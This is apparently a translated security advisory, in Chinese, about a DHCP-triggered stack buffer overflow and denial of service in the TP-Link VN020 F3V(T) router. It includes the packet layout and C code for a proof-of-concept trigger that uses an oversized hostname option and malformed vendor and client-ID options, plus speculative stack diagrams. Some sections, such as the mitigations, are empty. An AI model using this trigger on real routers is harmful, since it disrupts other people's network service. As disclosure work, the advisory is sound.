在运行固件版本tt_v6.2.1021的TP-Link VN020 F3V(T)路由器中发现了一个关键的漏洞。该漏洞使远程攻击者能够通过专门精心设计的DHCP发现数据包触发基于堆栈的缓冲区溢出,从而导致拒绝服务(DOS)条件。
受影响的设备:
重要说明:由于固件的专有性,确切的内部实现细节未知。该分析基于观察到的行为和黑盒测试。
[Basic DHCP Header]
0x00: 01 ; BOOTREQUEST
0x01: 01 ; Hardware type (Ethernet)
0x02: 06 ; Hardware address length
0x03: 00 ; Hops
0x04-0x07: XID ; Random transaction ID
0x08-0x09: 0000 ; Seconds elapsed
0x0A-0x0B: 8000 ; Flags (Broadcast)
0x0C-0x1F: 0000 ; Client/Server/Gateway IPs
0x20-0x28: MAC ; Client hardware address
0x29-0x2C: 0000 ; Padding
// Overflow trigger through hostname option
unsigned char long_hostname [ 128 ];
memset ( long_hostname , 'A' , sizeof ( long_hostname ) - 1 );
long_hostname [ 127 ] = '�' ;
add_option ( packet , offset , 0x0C , 127 , long_hostname ); // Vendor option manipulation
unsigned char vendor_specific [] = {
0x00 , 0x14 , 0x22 , // TP-Link vendor prefix
0xFF , 0xFF , 0xFF // Trigger condition
};
add_option ( packet , offset , 0x2B , sizeof ( vendor_specific ), vendor_specific ); // Claimed vs actual length mismatch
add_option ( packet , offset , 0x3D , 0xFF , ( unsigned char []) { 0x01 });尽管确切的内部实施尚不清楚,但观察到的行为表明潜在的内存腐败问题:
普通DHCP主机名处理
Stack Layout (Normal Case)
+------------------------+ Higher addresses
| Previous Frame |
+------------------------+
| Return Address (4) |
+------------------------+
| Saved EBP (4) |
+------------------------+
| |
| Hostname Buffer |
| (64 bytes) |
| |
+------------------------+ Lower addresses
| Other Variables |
+------------------------+
路由器内有可能发生什么?
Stack Layout (Overflow Case)
+------------------------+ Higher addresses
| Previous Frame |
+------------------------+
| Overwritten Return |
+------------------------+
| Overwritten EBP | <- Unknown state corruption
+------------------------+
| Overflow Data | <- 127 bytes of 'A'
| ... |
+------------------------+ Lower addresses
| Other Variables | <- Potentially corrupted
+------------------------+
这是理论上的,并且某些细节可能不是完全准确的,因为TP-Link仅向ISP提供了该路由器的固件。
路由器也可以尝试尝试自我重新启动自我,如此处所示,如下所示:
目前没有官方补丁。临时缓解包括:
穆罕默德·马塔拉(Mohamed Maatallah)
